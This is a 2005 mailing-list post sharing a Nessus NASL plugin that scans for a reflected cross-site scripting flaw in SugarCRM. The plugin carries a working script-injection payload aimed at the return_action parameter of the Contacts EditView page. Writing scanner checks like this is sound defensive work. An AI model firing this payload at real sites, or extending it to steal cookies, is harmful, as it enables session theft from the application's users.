Plugin for SugarCRM new XSS vulnerabilities
Joxean Koret
joxeankoret at yahoo.es
Sun Jan 2 09:56:05 EST 2005
Hi!
Attached a Nasl Plugin to try the newest XSS vulnerabilities in this
product.
Happy New Year!
-------------- next part --------------
#
# (C) Jose Antonio Coret
#
# This script is released under the GPLv2
#
if(description)
{
script_version("$Revision: 1.0 $");
script_bugtraq_id ( 12113 );
name["english"] = "SugarCRM Multiple Cross-Site Scripting Vulnerability";
script_name(english:name["english"]);
desc["english"] = "
The remote host is using SugarCRM, a PHP based application.
There is a bug in the remote version of this software which makes it
vulnerable to an Cross Site Scripting vulnerability.
Solution : Upgrade to the latest version of this software
Risk factor : High";
script_description(english:desc["english"]);
summary["english"] = "Checks for the presence of an Cross Site Scripting vulnerability in SugarCRM";
script_summary(english:summary["english"]);
script_category(ACT_ATTACK);
script_copyright(english:"This script is Copyright (C) 2005 Jose Antonio Coret");
family["english"] = "CGI abuses";
family["francais"] = "Abus de CGI";
script_family(english:family["english"], francais:family["francais"]);
script_dependencie("http_version.nasl");
script_require_ports("Services/www", 80);
exit(0);
}
#
# The script code starts here
#
include("http_func.inc");
include("http_keepalive.inc");
port = get_http_port(default:80);
if(!get_port_state(port))exit(0);
if(!can_host_php(port:port))exit(0);
function check(loc)
{
req = http_get(item:string(loc,
"/index.php?module=Contacts&action=EditView&return_module=&return_action=%22><script>alert(document.cookie)</script>"),
port:port);
r = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
if( r == NULL )exit(0);
if (egrep(pattern:"<script>alert(document.cookie)</script>", string:r))
{
security_hole(port);
exit(0);
}
}
check(loc:"/sugarcrm");
foreach dir (cgi_dirs())
{
check(loc:dir);
}
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://mail.nessus.org/pipermail/nessus/attachments/20050102/f37ad813/attachment.bin
More information about the Nessus
mailing list